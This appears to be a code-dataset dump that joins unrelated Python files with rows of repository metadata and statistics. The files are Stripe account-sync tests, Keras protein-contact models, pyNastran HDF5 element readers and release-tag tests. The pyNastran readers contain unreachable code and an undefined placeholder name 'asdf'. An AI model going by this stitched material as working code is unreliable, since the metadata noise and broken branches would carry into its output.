"tos_acceptance":{
"date":null,
"ip":"123.107.1.28",
"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
},
"business_logo":null,
"email":"operations@someurl.com",
"timezone":"Etc/UTC",
"statement_descriptor":"SOME COMP",
"default_currency":"cad",
"payout_schedule":{
"delay_days":3,
"interval":"manual"
},
"display_name":"Some Company",
"payout_statement_descriptor": "For reals",
"id":"acct_1A39IGDwqdd5icDO",
"payouts_enabled":true,
"external_accounts":{
"has_more":false,
"total_count":1,
"object":"list",
"data":[
{
"routing_number":"11000-000",
"bank_name":"SOME CREDIT UNION",
"account":"acct_1A39IGDwqdd5icDO",
"object":"other",
"currency":"cad",
"country":"CA",
"account_holder_name":"Luke Burden",
"last4":"6789",
"status":"new",
"fingerprint":"bZJnuqqS4qIX0SX0",
"account_holder_type":"individual",
"default_for_currency":true,
"id":"ba_1A39IGDwqdd5icDOn9VrFXlQ",
"metadata":{}
}
],
"url":"/v1/accounts/acct_1A39IGDwqdd5icDO/external_accounts"
},
"support_email":"support@someurl.com",
"metadata":{
"user_id":"9428"
},
"support_phone":"7788188181",
"business_name":"Woop Woop",
"object":"account",
"charges_enabled":true,
"business_name":"Woop Woop",
"debit_negative_balances":false,
"country":"CA",
"decline_charge_on":{
"avs_failure":true,
"cvc_failure":true
},
"product_description":"Monkey Magic",
"legal_entity":{
"dob": null,
"verification": null,
"personal_id_number_provided":false,
"first_name":"Luke",
"last_name":"Baaard",
"personal_address":{
"city":null,
"country":"CA",
"line2":null,
"line1":null,
"state":null,
"postal_code":null
},
"business_tax_id_provided":false,
"address":{
"city":"Vancouver",
"country":"CA",
"line2":null,
"line1":"14 Alberta St",
"state":"BC",
"postal_code":"V5Y4Z2"
},
"business_name":null,
"type":"individual"
},
"details_submitted":true,
"verification":{
"due_by":null,
"fields_needed":[
"legal_entity.personal_id_number"
],
"disabled_reason":null
}
}""")
cls.not_custom_account_data = json.loads(
"""{
"business_logo":null,
"business_name":"Woop Woop",
"business_url":"https://www.someurl.com",
"charges_enabled":true,
"country":"CA",
"default_currency":"cad",
"details_submitted":true,
"display_name":"Some Company",
"email":"operations@someurl.com",
"id":"acct_102t2K2m3chDH8uL",
"object":"account",
"payouts_enabled": true,
"statement_descriptor":"SOME COMP",
"support_address": {
"city": null,
"country": "DE",
"line1": null,
"line2": null,
"postal_code": null,
"state": null
},
"support_email":"support@someurl.com",
"support_phone":"7788188181",
"support_url":"https://support.someurl.com",
"timezone":"Etc/UTC",
"type":"standard"
}""")
def assert_common_attributes(self, account):
self.assertEqual(account.support_phone, "7788188181")
self.assertEqual(account.business_name, "Woop Woop")
self.assertEqual(account.country, "CA")
self.assertEqual(account.charges_enabled, True)
self.assertEqual(account.support_email, "support@someurl.com")
self.assertEqual(account.details_submitted, True)
self.assertEqual(account.email, "operations@someurl.com")
self.assertEqual(account.timezone, "Etc/UTC")
self.assertEqual(account.display_name, "Some Company")
self.assertEqual(account.statement_descriptor, "SOME COMP")
self.assertEqual(account.default_currency, "cad")
def assert_custom_attributes(self, account, dob=None, verification=None, acceptance_date=None, bank_accounts=0):
# extra top level attributes
self.assertEqual(account.debit_negative_balances, False)
self.assertEqual(account.product_description, "Monkey Magic")
self.assertEqual(account.metadata, {"user_id": "9428"})
self.assertEqual(account.payout_statement_descriptor, "For reals")
# legal entity
self.assertEqual(account.legal_entity_address_city, "Vancouver")
self.assertEqual(account.legal_entity_address_country, "CA")
self.assertEqual(account.legal_entity_address_line1, "14 Alberta St")
self.assertEqual(account.legal_entity_address_line2, None)
self.assertEqual(account.legal_entity_address_postal_code, "V5Y4Z2")
self.assertEqual(account.legal_entity_address_state, "BC")
self.assertEqual(account.legal_entity_dob, dob)
self.assertEqual(account.legal_entity_type, "individual")
self.assertEqual(account.legal_entity_first_name, "Luke")
self.assertEqual(account.legal_entity_last_name, "Baaard")
self.assertEqual(account.legal_entity_personal_id_number_provided, False)
# verification
if verification is not None:
self.assertEqual(
account.legal_entity_verification_details,
"Provided identity information could not be verified"
)
self.assertEqual(
account.legal_entity_verification_details_code, "failed_keyed_identity"
)
self.assertEqual(account.legal_entity_verification_document, None)
self.assertEqual(account.legal_entity_verification_status, "unverified")
self.assertEqual(
account.tos_acceptance_date,
acceptance_date
)
self.assertEqual(account.tos_acceptance_ip, "123.107.1.28")
self.assertEqual(
account.tos_acceptance_user_agent,
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
)
# decline charge on certain conditions
self.assertEqual(account.decline_charge_on_avs_failure, True)
self.assertEqual(account.decline_charge_on_cvc_failure, True)
# Payout schedule
self.assertEqual(account.payout_schedule_interval, "manual")
self.assertEqual(account.payout_schedule_delay_days, 3)
self.assertEqual(account.payout_schedule_weekly_anchor, None)
self.assertEqual(account.payout_schedule_monthly_anchor, None)
# verification status, key to progressing account setup
self.assertEqual(account.verification_disabled_reason, None)
self.assertEqual(account.verification_due_by, None)
self.assertEqual(
account.verification_fields_needed,
[
"legal_entity.personal_id_number"
]
)
# external accounts should be sync'd - leave the detail check to
# its own test
self.assertEqual(
account.bank_accounts.all().count(), bank_accounts
)
def test_sync_custom_account(self):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = accounts.sync_account_from_stripe_data(
self.custom_account_data, user=user
)
self.assertEqual(account.type, "custom")
self.assert_common_attributes(account)
self.assert_custom_attributes(
account,
dob=datetime.date(1999, 2, 3),
verification="full",
acceptance_date=datetime.datetime(2017, 3, 30, 19, 50, 52),
bank_accounts=1
)
@patch("pinax.stripe.actions.externalaccounts.sync_bank_account_from_stripe_data")
def test_sync_custom_account_no_dob_no_verification(self, SyncMock):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = accounts.sync_account_from_stripe_data(
self.custom_account_data_no_dob_no_verification_no_tosacceptance, user=user
)
self.assertEqual(account.type, "custom")
self.assert_common_attributes(account)
self.assert_custom_attributes(account)
self.assertFalse(SyncMock.called)
def test_sync_not_custom_account(self):
account = accounts.sync_account_from_stripe_data(
self.not_custom_account_data
)
self.assertNotEqual(account.type, "custom")
self.assert_common_attributes(account)
def test_deauthorize_account(self):
account = accounts.sync_account_from_stripe_data(
self.not_custom_account_data
)
accounts.deauthorize(account)
self.assertFalse(account.authorized)
class BankAccountsSyncTestCase(TestCase):
def setUp(self):
self.data = json.loads(
"""{
"id": "ba_19VZfo2m3chDH8uLo0r6WCia",
"object": "bank_account",
"account": "acct_102t2K2m3chDH8uL",
"account_holder_name": "Jane Austen",
"account_holder_type": "individual",
"bank_name": "STRIPE TEST BANK",
"country": "US",
"currency": "cad",
"default_for_currency": false,
"fingerprint": "ObHHcvjOGrhaeWhC",
"last4": "6789",
"metadata": {
},
"routing_number": "110000000",
"status": "new"
}
""")
def test_sync(self):
User = get_user_model()
user = User.objects.create_user(
username="snuffle",
email="upagus@test"
)
account = Account.objects.create(
stripe_id="acct_102t2K2m3chDH8uL",
type="custom",
user=user
)
bankaccount = externalaccounts.sync_bank_account_from_stripe_data(
self.data
)
self.assertEqual(bankaccount.account_holder_name, "Jane Austen")
self.assertEqual(bankaccount.account, account)
@patch("pinax.stripe.actions.externalaccounts.sync_bank_account_from_stripe_data")
def test_create_bank_account(self, SyncMock):
account = Mock()
externalaccounts.create_bank_account(account, 123455, "US", "usd")
self.assertTrue(account.external_accounts.create.called)
self.assertTrue(SyncMock.called)
| 39.044269
| 185
| 0.590457
| 12,767
| 133,180
| 5.942743
| 0.055769
| 0.020034
| 0.020113
| 0.025767
| 0.842562
| 0.804919
| 0.769938
| 0.736184
| 0.715438
| 0.678981
| 0
| 0.027511
| 0.290104
| 133,180
| 3,410
| 186
| 39.055718
| 0.774983
| 0.005451
| 0
| 0.676591
| 0
| 0.000342
| 0.197618
| 0.067904
| 0
| 0
| 0
| 0
| 0.147159
| 1
| 0.056468
| false
| 0.001711
| 0.004449
| 0
| 0.066051
| 0.002396
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
60283d3767102a62fff5c05524f74d2b51bcb845
| 165
|
py
|
Python
|
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
app/student/__init__.py
|
mecforlove/oj-web
|
3bec42e77666c6ab1d299d8c432016f7f1cd1cac
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mec
from flask import Blueprint
students = Blueprint('students', __name__)
from views import show_problems
| 20.625
| 42
| 0.721212
| 22
| 165
| 5.181818
| 0.818182
| 0.298246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.139394
| 165
| 8
| 43
| 20.625
| 0.795775
| 0.333333
| 0
| 0
| 0
| 0
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
607e2706ebd32ef255f891f787a3cef320319e20
| 5,073
|
py
|
Python
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 28
|
2020-04-29T07:33:06.000Z
|
2021-09-22T05:39:06.000Z
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 1
|
2021-11-12T15:12:38.000Z
|
2021-11-12T19:38:00.000Z
|
models.py
|
ba-lab/PDNET
|
d1547a334ee6e48526afcb4e0a4f698a04888ac5
|
[
"Apache-2.0"
] | 13
|
2020-05-03T04:38:35.000Z
|
2021-09-22T05:39:09.000Z
|
'''
Author: Badri Adhikari, University of Missouri-St. Louis, 12-18-2019
File: Contains tensorflow models for the DEEPCON architecture
'''
import tensorflow as tf
from tensorflow.python.keras import layers
from tensorflow.python.keras.layers import Input, Convolution2D, Activation, add, Dropout, BatchNormalization
from tensorflow.python.keras.models import Model
# A basic fully convolutional network
def basic_fcn(L, num_blocks, width, expected_n_channels):
input_shape = (L, L, expected_n_channels)
img_input = layers.Input(shape = input_shape)
x = img_input
for i in range(num_blocks):
x = layers.Conv2D(width, (3, 3), padding = 'same')(x)
x = layers.BatchNormalization()(x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(1, (3, 3), padding = 'same', kernel_initializer = 'one')(x)
x = layers.Activation('relu')(x)
inputs = img_input
model = tf.keras.models.Model(inputs, x, name = 'fcn')
return model
# Architecture DEEPCON (original)
def deepcon_rdd(L, num_blocks, width, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(1, 3, padding = 'same')(tower)
tower = Activation('sigmoid')(tower)
model = Model(my_input, tower)
return model
# Architecture DEEPCON (distances)
def deepcon_rdd_distances(L, num_blocks, width, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(1, 3, padding = 'same')(tower)
tower = Activation('relu')(tower)
model = Model(my_input, tower)
return model
# Architecture DEEPCON (binned)
def deepcon_rdd_binned(L, num_blocks, width, bins, expected_n_channels):
print('')
print('Model params:')
print('L', L)
print('num_blocks', num_blocks)
print('width', width)
print('expected_n_channels', expected_n_channels)
print('')
dropout_value = 0.3
my_input = Input(shape = (L, L, expected_n_channels))
tower = BatchNormalization()(my_input)
tower = Activation('relu')(tower)
tower = Convolution2D(width, 1, padding = 'same')(tower)
n_channels = width
d_rate = 1
for i in range(num_blocks):
block = BatchNormalization()(tower)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), padding = 'same')(block)
block = Dropout(dropout_value)(block)
block = Activation('relu')(block)
block = Convolution2D(n_channels, kernel_size = (3, 3), dilation_rate=(d_rate, d_rate), padding = 'same')(block)
tower = add([block, tower])
if d_rate == 1:
d_rate = 2
elif d_rate == 2:
d_rate = 4
else:
d_rate = 1
tower = BatchNormalization()(tower)
tower = Activation('relu')(tower)
tower = Convolution2D(bins, 3, padding = 'same')(tower)
tower = Activation('softmax')(tower)
model = Model(my_input, tower)
return model
| 37.029197
| 120
| 0.637295
| 639
| 5,073
| 4.885759
| 0.137715
| 0.038437
| 0.076233
| 0.053812
| 0.78123
| 0.779949
| 0.748559
| 0.72902
| 0.716848
| 0.716848
| 0
| 0.018447
| 0.230633
| 5,073
| 136
| 121
| 37.301471
| 0.78145
| 0.051646
| 0
| 0.844262
| 0
| 0
| 0.058333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032787
| false
| 0
| 0.032787
| 0
| 0.098361
| 0.172131
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
60a49a821b3996bd2766bbfd3fde0aedabadfafc
| 233
|
py
|
Python
|
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 3
|
2019-08-13T01:44:16.000Z
|
2019-12-10T04:05:56.000Z
|
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | null | null | null |
stacks/XIAOMATECH/1.0/services/OZONE/package/scripts/scm.py
|
tvorogme/dataops
|
acfa21df42a20768c004c6630a064f4e38e280b2
|
[
"Apache-2.0"
] | 7
|
2019-05-29T17:35:25.000Z
|
2021-12-04T07:55:10.000Z
|
from resource_management.libraries.script.script import Script
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions.check_process_status import check_process_status
import utils
| 38.833333
| 93
| 0.896996
| 30
| 233
| 6.733333
| 0.5
| 0.178218
| 0.326733
| 0.306931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064378
| 233
| 5
| 94
| 46.6
| 0.926606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
60df1c4d9d45d7277cf5e5e1489ef91f6bfda9ad
| 29
|
py
|
Python
|
tatk/dst/__init__.py
|
libing125/tatk
|
1473a162cf45a4a40a60473169bc034234412b2e
|
[
"Apache-2.0"
] | 81
|
2019-03-12T13:40:29.000Z
|
2022-01-17T10:59:21.000Z
|
tatk/dst/__init__.py
|
zqwerty/tatk
|
fafabc45d02ad889f59354acac4e3b1367e7d4bf
|
[
"Apache-2.0"
] | 35
|
2019-03-13T14:05:05.000Z
|
2021-08-25T15:38:14.000Z
|
tatk/dst/__init__.py
|
zqwerty/tatk
|
fafabc45d02ad889f59354acac4e3b1367e7d4bf
|
[
"Apache-2.0"
] | 41
|
2019-03-13T09:40:24.000Z
|
2022-03-07T17:59:07.000Z
|
from tatk.dst.dst import DST
| 14.5
| 28
| 0.793103
| 6
| 29
| 3.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
714ba8119e1c6114588f3d07f3a79c67ae838357
| 6,906
|
py
|
Python
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 293
|
2015-03-22T20:22:01.000Z
|
2022-03-14T20:28:24.000Z
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 512
|
2015-03-14T18:39:27.000Z
|
2022-03-31T16:15:43.000Z
|
pyNastran/dev/h5/geometry/h5_elements_2d.py
|
luzpaz/pyNastran
|
939e9eefdc87a3bf67939a23dc09f155b93969a0
|
[
"BSD-3-Clause"
] | 136
|
2015-03-19T03:26:06.000Z
|
2022-03-25T22:14:54.000Z
|
from __future__ import annotations
from typing import TYPE_CHECKING
#import numpy as np
import h5py
from ..h5_utils import read_basic_element, h5py_to_dataframe
if TYPE_CHECKING: # pragma: no cover
from pyNastran.bdf.bdf import BDF
def read_cshear(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
#('EID', 'PID', 'G', 'DOMAIN_ID')
read_basic_element(group, geom_model, geom_model.add_cshear)
#EID = group['EID']
#PID = group['PID']
#NIDS = group['G']
#DOMAIN_ID = group['DOMAIN_ID']
#for eid, pid, nids in zip(EID, PID, NIDS):
#obj = geom_model.add_cshear(eid, pid, nids, comment='')
#obj.validate()
def read_ctria3(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
geom_model.card_count[name] = len(group['EID'])
setattr(geom_model, name, group)
return
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctria3(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquad4(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
"""
Dataset:
attrs : <Attributes of HDF5 object at 1739457403880>
chunks : (270,)
compression : 'gzip'
compression_opts : 1
dims : <Dimensions of HDF5 object at 1739457403880>
dtype : dtype([('EID', '<i8'), ('PID', '<i8'), ('G', '<i8', (4,)), ('THETA', '<f8'), ('ZOFFS', '<f8'), ('TFLAG', '<i8'), ('T', '<f8', (4,)), ('MCID', '<i8'), ('DOMAIN_ID', '<i8')])
external : None
file : <HDF5 file "6+element-nastran-sol103.h5" (mode r)>
fillvalue : (0, 0, [0, 0, 0, 0], 0., 0., 0, [0., 0., 0., 0.], 0, 0)
fletcher32 : False
id : <h5py.h5d.DatasetID object at 0x00000194FFBD9BE8>
is_virtual : False
maxshape : (None,)
name : '/NASTRAN/INPUT/ELEMENT/CQUAD4'
nbytes : 4320
ndim : 1
parent : <HDF5 group "/NASTRAN/INPUT/ELEMENT" (1 members)>
ref : <HDF5 object reference>
regionref : <h5py._hl.base._RegionProxy object at 0x00000194FF9AA048>
scaleoffset : None
shape : (36,)
shuffle : True
size : 36
"""
geom_model.card_count[name] = len(group['EID'])
setattr(geom_model, name, group)
return
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquad4(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
def read_ctria6(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctria6(
eid, pid, nids, theta_mcid=theta_mcid, zoffset=zoffs,
tflag=tflag, T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquad8(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquad8(
eid, pid, nids, theta_mcid=theta_mcid, zoffset=zoffs,
tflag=tflag, T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
def read_ctriar(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3= [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_ctriar(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, comment='')
obj.validate()
def read_cquadr(name: str, group: h5py._hl.dataset.Dataset, geom_model: BDF) -> None:
#('EID', 'PID', 'G', 'THETA', 'ZOFFS', 'TFLAG', 'T', 'MCID', 'DOMAIN_ID')
EID = group['EID']
PID = group['PID']
NIDS = group['G']
THETA = group['THETA']
ZOFFS = group['ZOFFS']
TFLAG = group['TFLAG']
T = group['T']
MCID = group['MCID']
DOMAIN_ID = group['DOMAIN_ID']
for eid, pid, nids, theta, zoffs, tflag, t, mcid in zip(EID, PID, NIDS, THETA, ZOFFS, TFLAG, T, MCID):
if mcid == -1:
theta_mcid = theta
else:
asdf
assert tflag == 0, tflag
t1, t2, t3, t4 = [ti if ti != -1.0 else None
for ti in t]
obj = geom_model.add_cquadr(
eid, pid, nids,
theta_mcid=theta_mcid, zoffset=zoffs, tflag=tflag,
T1=t1, T2=t2, T3=t3, T4=t4, comment='')
obj.validate()
| 35.597938
| 185
| 0.552708
| 949
| 6,906
| 3.920969
| 0.132771
| 0.048374
| 0.056436
| 0.072561
| 0.781242
| 0.740124
| 0.740124
| 0.740124
| 0.740124
| 0.722386
| 0
| 0.043255
| 0.293658
| 6,906
| 193
| 186
| 35.782383
| 0.719557
| 0.179409
| 0
| 0.853333
| 0
| 0
| 0.040007
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.046667
| false
| 0
| 0.033333
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
718df44c644defbccaf0c01ece30c9353d11c419
| 1,286
|
py
|
Python
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 5
|
2016-05-16T18:46:26.000Z
|
2019-07-08T15:16:41.000Z
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 46
|
2016-02-18T16:54:36.000Z
|
2022-03-25T19:43:45.000Z
|
tests/test_eupsweeklymode.py
|
lsst-sqre/ltd-keeper
|
c658bcce726764e7416a8a386b418e83912b0f32
|
[
"Apache-2.0",
"MIT"
] | 4
|
2016-08-20T23:10:07.000Z
|
2022-03-25T19:52:09.000Z
|
"""Tests for `keeper.editiontracking.eupsweeklymode`."""
import pytest
from keeper.editiontracking.eupsweeklymode import WeeklyReleaseTag
def test_parsing() -> None:
tag = WeeklyReleaseTag("w_2018_01")
assert tag.year == 2018
assert tag.week == 1
tag = WeeklyReleaseTag("w_2018_26")
assert tag.year == 2018
assert tag.week == 26
# Git variant
tag = WeeklyReleaseTag("w.2018.01")
assert tag.year == 2018
assert tag.week == 1
# Git variant
tag = WeeklyReleaseTag("w.2018.26")
assert tag.year == 2018
assert tag.week == 26
with pytest.raises(ValueError):
WeeklyReleaseTag("v1_0")
with pytest.raises(ValueError):
WeeklyReleaseTag("w_2018")
with pytest.raises(ValueError):
WeeklyReleaseTag("w_2018_01rc1")
def test_comparisons() -> None:
assert WeeklyReleaseTag("w_2018_01") > WeeklyReleaseTag("w_2017_01")
assert not WeeklyReleaseTag("w_2018_01") < WeeklyReleaseTag("w_2017_01")
assert WeeklyReleaseTag("w_2018_20") >= WeeklyReleaseTag("w_2018_20")
assert WeeklyReleaseTag("w_2018_20") >= WeeklyReleaseTag("w_2018_01")
assert WeeklyReleaseTag("w_2018_20") <= WeeklyReleaseTag("w_2018_20")
assert not WeeklyReleaseTag("w_2018_20") == WeeklyReleaseTag("w_2018_01")
| 29.906977
| 77
| 0.7014
| 155
| 1,286
| 5.6
| 0.219355
| 0.352535
| 0.387097
| 0.158986
| 0.804147
| 0.748848
| 0.725806
| 0.617512
| 0.513825
| 0.403226
| 0
| 0.123936
| 0.178072
| 1,286
| 42
| 78
| 30.619048
| 0.697256
| 0.05832
| 0
| 0.392857
| 0
| 0
| 0.137874
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
